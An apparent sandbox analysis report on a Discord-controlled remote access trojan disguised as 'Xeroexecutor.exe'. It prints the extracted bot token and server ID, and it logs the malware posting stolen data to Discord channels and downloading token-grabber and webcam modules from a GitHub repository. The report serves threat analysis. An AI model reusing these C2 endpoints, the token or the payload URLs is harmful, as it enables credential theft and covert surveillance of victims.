discordrat | b4ca7c2c6efafb1d7402096885dcae56f6fb3d845b758ed3c1cfef21792e1444

Analysis

max time kernel
125s
max time network
126s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
09/05/2024, 14:23 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Xeroexecutor.exe
Size

78KB
MD5

a4b35f10a18f1c4360b00f828abbc2b5
SHA1

78c9ba86d8b3ca966b66ddb182c08268c79858a6
SHA256

b4ca7c2c6efafb1d7402096885dcae56f6fb3d845b758ed3c1cfef21792e1444
SHA512

47703141997cae647f52f692a62b38bc7543f739b5334f387f8753716cadb488898abeda21732b13c7153e0bcbc76a44c9d821f899c3b137892587538296bb3b
SSDEEP

1536:52WjO8XeEXFh5P7v88wbjNrfxCXhRoKV6+V+KPIC:5Zv5PDwbjNrmAE+WIC

Score

10^/10

discordrat persistence rat rootkit spyware stealer

Malware Config

Extracted

Family

discordrat

Attributes

discord_token
MTIwNjA0MDA2MDI2NTM2NTUwNA.GStFBi.KFxuLXKvS3XujUPdFiaRzwKmwtmjd2uDdKdcmY
server_id
1237709600602722354

Signatures

Discord RAT
A RAT written in C# using Discord as a C2.
stealer rootkit rat persistence discordrat
Downloads MZ/PE file
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 15 IoCs

Web Service

T1102

flow	ioc
12	discord.com
17	raw.githubusercontent.com
25	raw.githubusercontent.com
3	discord.com
14	discord.com
15	discord.com
28	discord.com
4	discord.com
19	discord.com
21	discord.com
27	discord.com
8	discord.com
11	discord.com
18	raw.githubusercontent.com
26	discord.com

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2676	Xeroexecutor.exe
Token: SeShutdownPrivilege	2676	Xeroexecutor.exe

C:\Users\Admin\AppData\Local\Temp\Xeroexecutor.exe
"C:\Users\Admin\AppData\Local\Temp\Xeroexecutor.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2676

Network

DNS

gateway.discord.gg

Xeroexecutor.exe

Remote address:

8.8.8.8:53

Request

gateway.discord.gg

IN A

Response

gateway.discord.gg

IN A

162.159.135.234

gateway.discord.gg

IN A

162.159.133.234

gateway.discord.gg

IN A

162.159.130.234

gateway.discord.gg

IN A

162.159.136.234

gateway.discord.gg

IN A

162.159.134.234
GET

https://gateway.discord.gg/?v=9&encording=json

Xeroexecutor.exe

Remote address:

162.159.135.234:443

Request

GET /?v=9&encording=json HTTP/1.1
Connection: Upgrade,Keep-Alive
Upgrade: websocket
Sec-WebSocket-Key: 26iAYpXxRTASShXuIDK1Ig==
Sec-WebSocket-Version: 13
Host: gateway.discord.gg

Response

HTTP/1.1 101 Switching Protocols

Date: Thu, 09 May 2024 14:23:34 GMT
Connection: upgrade
sec-websocket-accept: xvw7DTNjAc820iBnkI2DQMdFcAQ=
upgrade: websocket
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pNERUNV4VWnm0NklWCs0C%2BlWctksfZgkcnYz2Kr8ai6nIHEo4CiC5jW6S1rH1jT5QE%2Bg4xOIyBTJHbuIBcomwbS7JtaT1PqQjvqI70zaJT3o50kvAu4fxwlP4rOXTBDtoCJxEA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Content-Type-Options: nosniff
Server: cloudflare
CF-RAY: 8812591f6d4460dd-LHR
DNS

discord.com

Xeroexecutor.exe

Remote address:

8.8.8.8:53

Request

discord.com

IN A

Response

discord.com

IN A

162.159.136.232

discord.com

IN A

162.159.137.232

discord.com

IN A

162.159.135.232

discord.com

IN A

162.159.138.232

discord.com

IN A

162.159.128.233
POST

https://discord.com/api/v9/guilds/1237709600602722354/channels

Xeroexecutor.exe

Remote address:

162.159.136.232:443

Request

POST /api/v9/guilds/1237709600602722354/channels HTTP/1.1
authorization: Bot MTIwNjA0MDA2MDI2NTM2NTUwNA.GStFBi.KFxuLXKvS3XujUPdFiaRzwKmwtmjd2uDdKdcmY
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 29
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 201 Created

Date: Thu, 09 May 2024 14:23:36 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=b9274f580e0f11efa46a7a13f4bcce61; Expires=Tue, 08-May-2029 14:23:36 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: be56019ae011689ff5baf218062aacf5
x-ratelimit-limit: 2000
x-ratelimit-remaining: 1999
x-ratelimit-reset: 1715351016.418
x-ratelimit-reset-after: 86400.000
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K%2F0H9GkPG7sZjznhax8JHbW6pJ72LhTI7unnyaDpkuJ0WH7a4NOC6WUOU3jptLViuDCjLHG2rbHIyZx5mc7vmQEeigIvK84iH%2FM4qDjERL%2BXzARWMRYn%2BhioM1c2"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=b9274f580e0f11efa46a7a13f4bcce615a4b103059f82c89957e4d041c301ced9ffe6c9540ce712e90bb1456cc39b7f3; Expires=Tue, 08-May-2029 14:23:36 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=db113242c805bd68379ae757c1d2a7326a199ad8-1715264616; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=x86uKguZnLGbKrcpwAH8x9QMLXs3Tm_4neGZTg9lw_E-1715264616588-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8812592bdca57324-LHR
DNS

234.135.159.162.in-addr.arpa

Remote address:

8.8.8.8:53

Request

234.135.159.162.in-addr.arpa

IN PTR

Response
DNS

geolocation-db.com

Xeroexecutor.exe

Remote address:

8.8.8.8:53

Request

geolocation-db.com

IN A

Response

geolocation-db.com

IN A

159.89.102.253
GET

https://geolocation-db.com/json

Xeroexecutor.exe

Remote address:

159.89.102.253:443

Request

GET /json HTTP/1.1
Host: geolocation-db.com
Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently

Server: nginx/1.14.0 (Ubuntu)
Date: Thu, 09 May 2024 14:23:36 GMT
Content-Type: text/html
Content-Length: 194
Location: https://geolocation-db.com/json/
Connection: keep-alive
GET

https://geolocation-db.com/json/

Xeroexecutor.exe

Remote address:

159.89.102.253:443

Request

GET /json/ HTTP/1.1
Host: geolocation-db.com

Response

HTTP/1.1 200 OK

Server: nginx/1.14.0 (Ubuntu)
Date: Thu, 09 May 2024 14:23:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *
POST

https://discord.com/api/v9/channels/1238134282950676521/messages

Xeroexecutor.exe

Remote address:

162.159.136.232:443

Request

POST /api/v9/channels/1238134282950676521/messages HTTP/1.1
authorization: Bot MTIwNjA0MDA2MDI2NTM2NTUwNA.GStFBi.KFxuLXKvS3XujUPdFiaRzwKmwtmjd2uDdKdcmY
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 116
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Thu, 09 May 2024 14:23:37 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=b9b7ce340e0f11efb257dadefbae2c79; Expires=Tue, 08-May-2029 14:23:37 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1715264618.361
x-ratelimit-reset-after: 1.000
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LXAORW3WOUuIhRTr952VRUOQ07sWTOjYUOXsMclguNQwxj%2BYlnGS6lo%2BLApNeMgkBM0yHAZLn29eSDqZhWfjkYmFN7Re%2FRZJpsMsn%2BMknSChVMgJrkV3kGnj2Gal"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=b9b7ce340e0f11efb257dadefbae2c79d456d5a29d6e8a7e54f42fc3a484543b10e3c8096b4fc673cf3ea53082b42237; Expires=Tue, 08-May-2029 14:23:37 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=c3b3aa51e84a0bce716afb777fac4983703e1d6d-1715264617; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=QQo4n5cBgvbVnTOsv3D8uysehUQ1oePMyuQRKc1cFEk-1715264617536-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 88125931cdd276cc-LHR
DNS

232.136.159.162.in-addr.arpa

Remote address:

8.8.8.8:53

Request

232.136.159.162.in-addr.arpa

IN PTR

Response
DNS

253.102.89.159.in-addr.arpa

Remote address:

8.8.8.8:53

Request

253.102.89.159.in-addr.arpa

IN PTR

Response
POST

https://discord.com/api/v9/channels/1238134282950676521/messages

Xeroexecutor.exe

Remote address:

162.159.136.232:443

Request

POST /api/v9/channels/1238134282950676521/messages HTTP/1.1
authorization: Bot MTIwNjA0MDA2MDI2NTM2NTUwNA.GStFBi.KFxuLXKvS3XujUPdFiaRzwKmwtmjd2uDdKdcmY
Content-Type: multipart/form-data; boundary="0b7af09f-1a4b-473f-8fee-8a83f669034f"
Host: discord.com
Content-Length: 429690
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Thu, 09 May 2024 14:23:49 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=c107038a0e0f11efba074a1ad3516406; Expires=Tue, 08-May-2029 14:23:49 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1715264630.216
x-ratelimit-reset-after: 1.000
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TyYc5VkzTsbhb9%2FdVZbBQrV6ZL0Q61UeXiSsmq2MAuEtSrG2OoVhVOyjGILnuu9xRvlSN1g7rAJYz4qJ%2FIu3jR3JYZslDWdJK4LYaQlU3HWe43GdICL1EXtG0vnj"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=c107038a0e0f11efba074a1ad351640653ccf9503c86a9a31b8920d67b48c40cc30853fe42bae314dddafc93311fdeb8; Expires=Tue, 08-May-2029 14:23:49 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=4d2d09abd90ca0308dbeac8f4c7934388a76aded-1715264629; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=NhHutmer7BF2rF3rPM1QEhsMaFETW4khjoyEn3bv5LU-1715264629800-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 88125979c834941b-LHR
POST

https://discord.com/api/v9/channels/1238134282950676521/messages

Xeroexecutor.exe

Remote address:

162.159.136.232:443

Request

POST /api/v9/channels/1238134282950676521/messages HTTP/1.1
authorization: Bot MTIwNjA0MDA2MDI2NTM2NTUwNA.GStFBi.KFxuLXKvS3XujUPdFiaRzwKmwtmjd2uDdKdcmY
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 31
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Thu, 09 May 2024 14:23:50 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=c13bc9120e0f11efa5cd7ef7caddeb3d; Expires=Tue, 08-May-2029 14:23:50 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 3
x-ratelimit-reset: 1715264631.221
x-ratelimit-reset-after: 1.175
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3%2FlY15EmmpCTtkAfjZ08xu8JBudQ4HwOHL3GbWm%2FR0zLF60GEraeXlyZq22NIpYs6%2BQMbDViGfSoqRTFnYvQYYjdyIZlnTOBmSZUYFzETHqeHJZW9Kxeif25dCG4"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=c13bc9120e0f11efa5cd7ef7caddeb3db108e21db7ccbf144bb2f3824b4a9082d25bfc3d56ddc7922c57ec6f3d3cc63f; Expires=Tue, 08-May-2029 14:23:50 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=f6cfec3732f0bed84bd169e004f9f2931489d36a-1715264630; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=EU8qKb_d503I2bIYIJdoQwb_9QiZmjlT8z0hfx8uz8k-1715264630146-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 881259810d17949c-LHR
POST

https://discord.com/api/v9/channels/1238134282950676521/messages

Xeroexecutor.exe

Remote address:

162.159.136.232:443

Request

POST /api/v9/channels/1238134282950676521/messages HTTP/1.1
authorization: Bot MTIwNjA0MDA2MDI2NTM2NTUwNA.GStFBi.KFxuLXKvS3XujUPdFiaRzwKmwtmjd2uDdKdcmY
Content-Type: multipart/form-data; boundary="9c70f21a-37b0-4f9d-a736-294f6de117c8"
Host: discord.com
Content-Length: 3557
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Thu, 09 May 2024 14:24:03 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=c9291fee0e0f11ef87867ee3850b10bd; Expires=Tue, 08-May-2029 14:24:03 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1715264644.031
x-ratelimit-reset-after: 1.000
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iI7Zkamq078CQMvt6hNUdHZ%2F5xRX0buDZIocaVQsrPB0DUlt7IsgWOLSWkDi3gv07kJi4DXUpbfxnn3KNZtemdHb0ywnzicamcc6ew9RpKZGheBNKOAOWlT%2FePU7"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=c9291fee0e0f11ef87867ee3850b10bd6eaca715e2631d527c05eba598e51446694bf93584aaba494cd060d32632f86f; Expires=Tue, 08-May-2029 14:24:03 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=df9f07d9999f1566681e241643ca11fb25020dba-1715264643; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=kp9yikD.9AYczCKuJwmPGejBrw3hBQVPx0UVH4eMz34-1715264643444-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 881259d1bdaa24b7-LHR
POST

https://discord.com/api/v9/channels/1238134282950676521/messages

Xeroexecutor.exe

Remote address:

162.159.136.232:443

Request

POST /api/v9/channels/1238134282950676521/messages HTTP/1.1
authorization: Bot MTIwNjA0MDA2MDI2NTM2NTUwNA.GStFBi.KFxuLXKvS3XujUPdFiaRzwKmwtmjd2uDdKdcmY
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 31
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Thu, 09 May 2024 14:24:03 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=c95eed9a0e0f11ef8a96ee0fdedbfaae; Expires=Tue, 08-May-2029 14:24:03 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 3
x-ratelimit-reset: 1715264645.025
x-ratelimit-reset-after: 1.329
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qCsvN0eqnwTCJaL1OdCL%2BqjaPjVUJgpcbCpYtyfGpC8pM4L9wbGoatS80zuj0Md9DNJIwJgE5gS2GDeyvSxkqMupLwxtAnL15%2BbIipbzhKp1RfRaCKS7Leo0gvos"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=c95eed9a0e0f11ef8a96ee0fdedbfaae4cba57d10d1d3d3844b4c3cae959069cc3daa742ab76399ec891938ffaa5a278; Expires=Tue, 08-May-2029 14:24:03 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=df9f07d9999f1566681e241643ca11fb25020dba-1715264643; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=CQscJ9x_5JYZd0RB6OnAZ8Q1AOZDkPd1P6K_ZvZQZg8-1715264643815-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 881259d649867198-LHR
DNS

raw.githubusercontent.com

Xeroexecutor.exe

Remote address:

8.8.8.8:53

Request

raw.githubusercontent.com

IN A

Response

raw.githubusercontent.com

IN A

185.199.109.133

raw.githubusercontent.com

IN A

185.199.111.133

raw.githubusercontent.com

IN A

185.199.108.133

raw.githubusercontent.com

IN A

185.199.110.133
GET

https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Token%20grabber.dll

Xeroexecutor.exe

Remote address:

185.199.109.133:443

Request

GET /moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Token%20grabber.dll HTTP/1.1
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 2901504
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: application/octet-stream
ETag: "7aa094c7a5e7645371637e2935e65a95ac7ec8899b4f08b38009a9f1887128d9"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 520A:17E061:3B5A3F:48EFFD:663CDCA6
Accept-Ranges: bytes
Date: Thu, 09 May 2024 14:24:39 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600085-LCY
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1715264679.998598,VS0,VE199
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 538f4d5eff5fb505522334cff6a94d1eacf807e9
Expires: Thu, 09 May 2024 14:29:39 GMT
Source-Age: 0
POST

https://discord.com/api/v9/channels/1238134282950676521/messages

Xeroexecutor.exe

Remote address:

162.159.136.232:443

Request

POST /api/v9/channels/1238134282950676521/messages HTTP/1.1
authorization: Bot MTIwNjA0MDA2MDI2NTM2NTUwNA.GStFBi.KFxuLXKvS3XujUPdFiaRzwKmwtmjd2uDdKdcmY
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 20
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Thu, 09 May 2024 14:24:40 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=df0afe720e0f11efb08556f99f94da73; Expires=Tue, 08-May-2029 14:24:40 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1715264681.039
x-ratelimit-reset-after: 1.000
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Lsb8%2Bn1SuAGTkjVowoOxZUylyCfidozjUPeP00CyWftmp4qo6IELWnv3MsquYyWaFQfCUXzjkyfcFvMTBfxw8ZKSVydMZyenb8I70v%2FoKhalU4N%2BCVQkbqG8Vr7q"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=df0afe720e0f11efb08556f99f94da7330d953b55fa52cc76d030e691d48b209c471300f16eef5692765464f2041e819; Expires=Tue, 08-May-2029 14:24:40 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=9fed67a20803f8a2d12c0145ac82f6fdd218f820-1715264680; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=7QIfCTAc5akM358jxHdiJsw2fON.ylycnpSku4SM51Q-1715264680162-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 88125ab939179503-LHR
DNS

133.109.199.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

133.109.199.185.in-addr.arpa

IN PTR

Response

133.109.199.185.in-addr.arpa

IN PTR

cdn-185-199-109-133githubcom
POST

https://discord.com/api/v9/channels/1238134282950676521/messages

Xeroexecutor.exe

Remote address:

162.159.136.232:443

Request

POST /api/v9/channels/1238134282950676521/messages HTTP/1.1
authorization: Bot MTIwNjA0MDA2MDI2NTM2NTUwNA.GStFBi.KFxuLXKvS3XujUPdFiaRzwKmwtmjd2uDdKdcmY
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 31
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Thu, 09 May 2024 14:24:40 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=df3f10ae0e0f11ef8953a27d37c5972a; Expires=Tue, 08-May-2029 14:24:40 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 3
x-ratelimit-reset: 1715264682.039
x-ratelimit-reset-after: 1.630
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sanHyNzJwbZDqLJKKi5cV4xBSNAPYQ2p8ZcCX5D4g3W69q7WSmnU%2F4x%2FEMcohuQ8CRbktFIq%2Fks3eFhJmhB4cE3iXmgjGehiImt%2Bkr3KiSgCE%2FIK9WNWgwhfB6Og"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=df3f10ae0e0f11ef8953a27d37c5972a1e8724111627e64e20fe8ec32ee64f6aeb9861ede0d2d28478b6e9369b085f06; Expires=Tue, 08-May-2029 14:24:40 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=9fed67a20803f8a2d12c0145ac82f6fdd218f820-1715264680; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=6IfMpQHY4tG9KbUqXiMqNRrfoBEVKM8ap_LuFxwTFeE-1715264680514-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 88125abbca3a79c6-LHR
DNS

13.227.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

13.227.111.52.in-addr.arpa

IN PTR

Response
GET

https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Webcam.dll

Xeroexecutor.exe

Remote address:

185.199.109.133:443

Request

GET /moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Webcam.dll HTTP/1.1
Host: raw.githubusercontent.com

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 39936
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: application/octet-stream
ETag: "f50f41ce6d31d22a2bffcc57235e46a4d7a05fb38896fd150333f34701eb4b56"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 515C:1CC8B4:2ED44A:397B90:663CDCBE
Accept-Ranges: bytes
Date: Thu, 09 May 2024 14:25:10 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600096-LCY
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1715264711.545413,VS0,VE157
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 13e5eacf71b2ed7f841b43abb8b0846c6807e6c7
Expires: Thu, 09 May 2024 14:30:10 GMT
Source-Age: 0
POST

https://discord.com/api/v9/channels/1238134282950676521/messages

Xeroexecutor.exe

Remote address:

162.159.136.232:443

Request

POST /api/v9/channels/1238134282950676521/messages HTTP/1.1
authorization: Bot MTIwNjA0MDA2MDI2NTM2NTUwNA.GStFBi.KFxuLXKvS3XujUPdFiaRzwKmwtmjd2uDdKdcmY
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 31
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Thu, 09 May 2024 14:25:11 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=f181d76a0e0f11efb6b79ac70ff69aa5; Expires=Tue, 08-May-2029 14:25:11 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1715264712.004
x-ratelimit-reset-after: 1.000
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T%2Fu8bG6l90l9JOVacq7Pa4cghpHOoWWMnB%2FZeFyCfBH%2Ft6EPG0Qf9LSPf9zU2BEkR%2BzBetIlsafnoZJ75DAcob10PQz4vGhVT89cIKfEXGY%2BXIBhi6aVdeChPul2"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
